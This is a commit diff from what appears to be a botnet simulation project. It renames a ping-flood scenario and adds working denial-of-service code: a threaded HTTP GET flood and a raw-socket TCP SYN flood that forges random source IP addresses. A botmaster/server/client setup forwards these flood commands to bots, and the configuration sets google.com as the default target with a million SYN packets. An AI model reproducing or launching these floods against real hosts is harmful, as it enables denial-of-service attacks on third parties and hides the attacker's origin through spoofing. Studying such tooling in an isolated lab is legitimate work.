Commits

Joshua Bonsink committed d7cc9bd

Renamed the ddos_ping_flooding scenario. Added TCP syn flooding attack and HTTP Get flooding attack.

  • Participants
  • Parent commits 4d1ee9e

Comments (0)

Files changed (15)

File scenario/ddos_flooding/__init__.py

+"""Initialize ddos_ping_flooding."""
+
+from scenario.ddos_flooding.client_cmd import ClientCMD
+from scenario.ddos_flooding.server_cmd import ServerCMD
+from scenario.ddos_flooding.botmaster import BotMaster
+from scenario.ddos_flooding import config

File scenario/ddos_flooding/attacks/__init__.py

Empty file added.

File scenario/ddos_flooding/attacks/http_get_flood.py

+import socket
+from threading import Thread
+
+def auto_send_request(hostname, port=80, num_request=10):
+    """
+    
+    This function is run in a separate thread. It sends http get requests to a
+    specific host.
+    
+    """
+    for _ in range(num_request):
+        try:
+            sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+            sock.connect((str(hostname), int(port)))
+            sock.send("GET / HTTP/1.1\r\n\r\n")
+            sock.close()            
+        except socket.error as err:
+            print err
+                
+def start_http_get_flood(hostname, port=80, num_request=1000, num_threads=100):    
+    """Start the http get flooding.""" 
+    number_of_requests_per_thread = int(num_request/num_threads)
+    
+    try:
+        for _ in range(num_threads):
+            flood_thread = Thread( 
+                              target=auto_send_request,\
+                              args=(hostname, port, number_of_requests_per_thread) 
+                              )
+            flood_thread.start()
+    except (KeyboardInterrupt, SystemExit):
+        print "\n! Receive Keyboard interrupt, quitting threads. \n"
+        
+    print("\nDone %i requests on %s" % (num_request, hostname))

File scenario/ddos_flooding/attacks/tcp_syn_flood.py

+import socket
+import sys
+import struct
+
+from random import randrange
+from threading import Thread
+
+NOT_VALID = [10, 127, 169, 172, 192]
+
+def generate_random_ip():
+    """Generate a random ip address"""
+    first = randrange(1, 256)
+    while first in NOT_VALID:
+        first = randrange(1, 256)
+
+    return ".".join([str(first), str(randrange(1, 256)), \
+                      str(randrange(1, 256)), str(randrange(1, 256))])  
+
+def auto_send_packets(port, dest_ip, num_packets):
+    """
+    
+    This function is run in a separate thread. It sends tcp syn packets to a
+    specific host.
+    
+    """
+    try:
+        sock = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_TCP)
+    except socket.error as err:
+        print 'Socket could not be created. Error: ' + err
+        sys.exit()
+     
+    # tell kernel not to put in headers, since we are providing it
+    sock.setsockopt(socket.IPPROTO_IP, socket.IP_HDRINCL, 1)
+         
+    for _ in range(num_packets):
+        source_ip = generate_random_ip()
+        packet = construct_packet(source_ip, dest_ip)
+        try:
+            sock.sendto(packet, (dest_ip , port ))
+        except socket.error as err:
+            print err
+        
+def start_syn_flood(hostname, port, num_packets, num_threads):
+    """Start the tcp syn flood."""
+    dest_ip = socket.gethostbyname(hostname)
+        
+    num_packets_per_thread = int(num_packets/num_threads)
+    
+    try:
+        for _ in range(num_threads):
+            flood_thread = Thread( 
+                              target=auto_send_packets,\
+                              args=(port, dest_ip, num_packets_per_thread) 
+                              )
+            flood_thread.start()
+    except (KeyboardInterrupt, SystemExit):
+        print "\n! Receive Keyboard interrupt, quitting threads. \n"
+        
+    print("\nDone %i requests on %s" % (num_packets, hostname))
+   
+def get_checksum(msg):
+    """
+    
+    This function calculates checksums. The loop takes 2 characters at a time.
+    
+    """
+    checksum = 0
+    
+    for i in range(0, len(msg), 2):
+        val = (ord(msg[i]) << 8) + (ord(msg[i+1]) )
+        checksum = checksum + val
+     
+    checksum = (checksum >> 16) + (checksum & 0xffff)
+    checksum = ~checksum & 0xffff     
+    return checksum
+ 
+def construct_packet(source_ip, dest_ip):
+    """Construct the tcp syn packet."""       
+    # ip header fields
+    ihl = 5
+    version = 4
+    tos = 0
+    tot_len = 20 + 20   
+    packet_id = 54321  
+    frag_off = 0
+    ttl = 255
+    protocol = socket.IPPROTO_TCP
+    check = 10 
+    saddr = socket.inet_aton ( source_ip )  
+    daddr = socket.inet_aton ( dest_ip )
+     
+    ihl_version = (version << 4) + ihl
+     
+    # the ! in the pack format string means network order
+    ip_header = struct.pack('!BBHHHBBH4s4s' , ihl_version, tos, tot_len, packet_id, frag_off, ttl, protocol, check, saddr, daddr)
+     
+    # tcp header fields
+    source_port = 1234   
+    dest_port = 80   
+    seq = 0
+    ack_seq = 0
+    doff = 5    #4 bit field, size of tcp header, 5 * 4 = 20 bytes
+    #tcp flags
+    fin = 0
+    syn = 1
+    rst = 0
+    psh = 0
+    ack = 0
+    urg = 0
+    window = socket.htons (5840)    #   maximum allowed window size
+    check = 0
+    urg_ptr = 0
+     
+    offset_res = (doff << 4) + 0
+    tcp_flags = fin + (syn << 1) + (rst << 2) + (psh <<3) + (ack << 4) + (urg << 5)
+     
+    # the ! in the pack format string means network order
+    tcp_header = struct.pack('!HHLLBBHHH', source_port, dest_port, seq,\
+                     ack_seq, offset_res, tcp_flags, window, check, urg_ptr)
+     
+    # pseudo header fields
+    source_address = socket.inet_aton( source_ip )
+    dest_address = socket.inet_aton(dest_ip)
+    placeholder = 0
+    protocol = socket.IPPROTO_TCP
+    tcp_length = len(tcp_header)
+     
+    psh = struct.pack('!4s4sBBH', source_address, dest_address, placeholder,\
+                      protocol , tcp_length)
+    psh = psh + tcp_header
+     
+    tcp_checksum = get_checksum(psh)
+     
+    # make the tcp header again and fill the correct checksum
+    tcp_header = struct.pack('!HHLLBBHHH' , source_port, dest_port, seq, ack_seq, offset_res, tcp_flags,  window, tcp_checksum , urg_ptr)
+     
+    # final full packet - syn packets dont have any data
+    return ip_header + tcp_header

File scenario/ddos_flooding/botmaster.py

+"""
+
+This file contains the BotMaster Command Meta Description for the ddos ping
+flooding scenario.
+
+"""
+
+from core.nodes.botmaster import BotMasterOneCMD
+from scenario.ddos_flooding.config import Botmaster
+
+class BotMaster(BotMasterOneCMD):
+    
+    """This class is a subclass of BotMasterOneCMD."""
+    
+    def __init__(self, desc=None):
+        if desc == None:
+            desc = Botmaster()
+            
+        BotMasterOneCMD.__init__(self, desc )
+

File scenario/ddos_flooding/client_cmd.py

+"""
+
+This file contains the Client Command Meta Description for the ddos ping
+flooding scenario.
+
+"""
+from core.real import PhysicalNode 
+from core.nodes.client import ClientCMD as CCMD
+
+from scenario.ddos_flooding.config import ClientDescription
+from scenario.ddos_flooding.attacks.http_get_flood import start_http_get_flood
+from scenario.ddos_flooding.attacks.tcp_syn_flood import start_syn_flood
+           
+class ClientCMD(CCMD):
+    
+    """This class is a subclass of ClientCMD."""
+    
+    def __init__(self, desc=None):
+        if desc == None:
+            desc = ClientDescription()
+            
+        CCMD.__init__(self, desc)
+
+    def ping_flood(self, sock, data):
+        """Start ping flood."""        
+        self.node.ping(sock, data, threaded=True)
+
+    def get_request_flood(self, sock, data):
+        """Start http get request flood."""
+        start_http_get_flood(data.hostname, data.port, data.num_requests, data.num_threads)
+    
+    def syn_flood(self, sock, data):
+        """Start TCP syn flood."""
+        start_syn_flood(data.hostname, data.port, data.num_packets, data.num_threads)
+                    
+if __name__ == "__main__":
+    cmd = ClientCMD()
+    node = PhysicalNode()
+    cmd.install(node)
+    node.start()
+

File scenario/ddos_flooding/config.py

+"""
+
+This file is used to configure the botmaster, clients and server in the file
+exfiltration scenario.
+
+"""
+
+from core.cmd.description import ServerDescription, ClientDescription 
+from core.cmd.description import BotmasterDescription
+
+class Botmaster(BotmasterDescription):
+    
+    """
+    
+    This class is the subclass of the default botmaster description. The
+    default settings are:
+    
+    server_address = '127.0.0.1'
+    server_port = 3333
+    request_timeout = 10
+    initial = 'waiting'
+    start_action = 'request_connect'
+    self.master_password = '1234'
+    self.interval = 2 
+    self.num_commands = 1
+    self.command = None
+    
+    There are three types of flooding attacks:
+    Ping flooding - PingFloodCmd
+    Http get request flooding - HttpGetFloodCmd
+    Tcp syn flooding - TcpSynFloodCmd
+    
+    """
+    
+    def __init__(self):
+        """Initialize the botmaster description."""
+        BotmasterDescription.__init__(self)
+        self.command = PingFloodCmd()
+
+class Client(ClientDescription):
+    
+    """
+    
+    This class is the subclass of the default client description. The
+    default settings are:
+    
+    server_address = '127.0.0.1'
+    server_port = 3333
+    request_timeout = 10
+    initial = 'disconn'
+    start_action = 'request_connect'
+    
+    """
+    
+    def __init__(self):
+        """Initialize the client description."""
+        ClientDescription.__init__(self)
+        
+class Server(ServerDescription):
+    
+    """
+    
+    This class is the subclass of the default client description. The
+    default settings are:
+    
+    server_address = '127.0.0.1'
+    server_port = 3333
+    request_timeout = 10    
+    initial = 'waiting'
+    start_action = 'initialize'
+    self.master_password = '1234'
+    
+    """
+    
+    def __init__(self):
+        """Initialize the server description."""
+        ServerDescription.__init__(self)
+        
+class PingFloodCmd(object):
+   
+    """
+    
+    This class specifies the ping command that is send to the bots connected
+    to the server.
+    
+    """
+    
+    def __init__(self):
+        """Specify the settings here."""
+        self.event = 'forward_to_bots'
+        self.bot_event = 'ping_flood'
+        self.hostname = 'google.com'
+        self.timeout = 1000
+        self.num_pings = 10
+        self.packet_size = 55    
+        
+class HttpGetFloodCmd(object):
+    """
+    
+    This class specifies the http get flood command that is send to the 
+    bots connected to the server.
+    
+    """
+    
+    def __init__(self):
+        """Specify the settings here."""
+        self.event = 'forward_to_bots'
+        self.bot_event = 'get_request_flood'
+        self.hostname = 'google.com'
+        self.port = 80
+        self.num_requests = 100
+        self.num_threads = 10
+        self.speed = 20    
+        
+class TcpSynFloodCmd(object):
+    """
+    
+    This class specifies the tcp syn flood command that is send to the 
+    bots connected to the server.
+    
+    """
+    def __init__(self):         
+        """Specify the settings here."""
+        self.event = 'forward_to_bots'
+        self.bot_event = 'syn_flood'
+        self.hostname = 'google.com'        
+        self.port = 80
+        self.num_packets = 1000000
+        self.num_threads = 100

File scenario/ddos_flooding/server_cmd.py

+"""
+
+This file contains the Server Command Meta Description for the ddos ping
+flooding scenario.
+
+"""
+
+from core.nodes.server import ServerCMD as SCMD
+from scenario.ddos_flooding.config import ServerDescription as Description
+ 
+class ServerCMD(SCMD):
+    
+    """This class is a subclass of ServerCMD."""
+    
+    def __init__(self, desc=None):        
+        """Initialize"""
+        
+        if desc == None:
+            desc = Description()
+        
+        SCMD.__init__(self, desc)

File scenario/ddos_flooding/simple_ddos.adesc

+# temp

File scenario/ddos_ping_flooding/__init__.py

-"""Initialize ddos_ping_flooding."""
-
-from scenario.ddos_ping_flooding.client_cmd import ClientCMD
-from scenario.ddos_ping_flooding.server_cmd import ServerCMD
-from scenario.ddos_ping_flooding.botmaster import BotMaster
-from scenario.ddos_ping_flooding import config

File scenario/ddos_ping_flooding/botmaster.py

-"""
-
-This file contains the BotMaster Command Meta Description for the ddos ping
-flooding scenario.
-
-"""
-
-from core.nodes.botmaster import BotMasterOneCMD
-from scenario.ddos_ping_flooding.config import Botmaster
-
-class BotMaster(BotMasterOneCMD):
-    
-    """This class is a subclass of BotMasterOneCMD."""
-    
-    def __init__(self, desc=None):
-        if desc == None:
-            desc = Botmaster()
-            
-        BotMasterOneCMD.__init__(self, desc )
-

File scenario/ddos_ping_flooding/client_cmd.py

-"""
-
-This file contains the Client Command Meta Description for the ddos ping
-flooding scenario.
-
-"""
-
-from core.real import PhysicalNode 
-from core.nodes.client import ClientCMD as CCMD
-from scenario.ddos_ping_flooding.config import ClientDescription
-
-class ClientCMD(CCMD):
-    
-    """This class is a subclass of ClientCMD."""
-    
-    def __init__(self, desc=None):
-        if desc == None:
-            desc = ClientDescription()
-            
-        CCMD.__init__(self, desc)
-
-    def send_ping(self, sock, data):
-        """Send ping."""
-        print 'send_ping in ClientCMD'
-        self.node.ping(sock, data, threaded=True)
-
-    def stop_ping(self, sock):
-        """Stop the ping flooding."""
-        self.node.stop_app(sock, 'ping')
-
-if __name__ == "__main__":
-    cmd = ClientCMD()
-    node = PhysicalNode()
-    cmd.install(node)
-    node.start()

File scenario/ddos_ping_flooding/config.py

-"""
-
-This file is used to configure the botmaster, clients and server in the file
-exfiltration scenario.
-
-"""
-
-from core.cmd.description import ServerDescription, ClientDescription 
-from core.cmd.description import BotmasterDescription
-
-class Botmaster(BotmasterDescription):
-    
-    """
-    
-    This class is the subclass of the default botmaster description. The
-    default settings are:
-    
-    server_address = '127.0.0.1'
-    server_port = 3333
-    request_timeout = 10
-    inital = 'waiting'
-    start_action = 'request_connect'
-    self.master_password = '1234'
-    self.interval = 2 
-    self.num_commands = 1
-    self.command = None
-    
-    """
-    
-    def __init__(self):
-        """Initialize the botmaster description."""
-        BotmasterDescription.__init__(self)
-        self.command = PingCmd()
-
-class Client(ClientDescription):
-    
-    """
-    
-    This class is the subclass of the default client description. The
-    default settings are:
-    
-    server_address = '127.0.0.1'
-    server_port = 3333
-    request_timeout = 10
-    initial = 'disconn'
-    start_action = 'request_connect'
-    
-    """
-    
-    def __init__(self):
-        """Initialize the client description."""
-        ClientDescription.__init__(self)
-        
-class Server(ServerDescription):
-    
-    """
-    
-    This class is the subclass of the default client description. The
-    default settings are:
-    
-    server_address = '127.0.0.1'
-    server_port = 3333
-    request_timeout = 10    
-    initial = 'waiting'
-    start_action = 'initialize'
-    self.master_password = '1234'
-    
-    """
-    
-    def __init__(self):
-        """Initialize the server description."""
-        ServerDescription.__init__(self)
-        
-class PingCmd(object):
-   
-    """
-    
-    This class specifies the ping command that is send to the bots connected
-    with the server.
-    
-    """
-    
-    def __init__(self):
-        """Specify the settings here."""
-        self.event = 'forward_to_bots'
-        self.bot_event = 'send_ping'
-        self.hostname = 'google.com'

File scenario/ddos_ping_flooding/server_cmd.py

-"""
-
-This file contains the Server Command Meta Description for the ddos ping
-flooding scenario.
-
-"""
-
-from core.nodes.server import ServerCMD as SCMD
-from scenario.ddos_ping_flooding.config import ServerDescription as Description
- 
-class ServerCMD(SCMD):
-    
-    """This class is a subclass of ServerCMD."""
-    
-    def __init__(self, desc=None):        
-        """Initialize"""
-        
-        if desc == None:
-            desc = Description()
-        
-        SCMD.__init__(self, desc)

File scenario/ddos_ping_flooding/simple_ddos.adesc

-# temp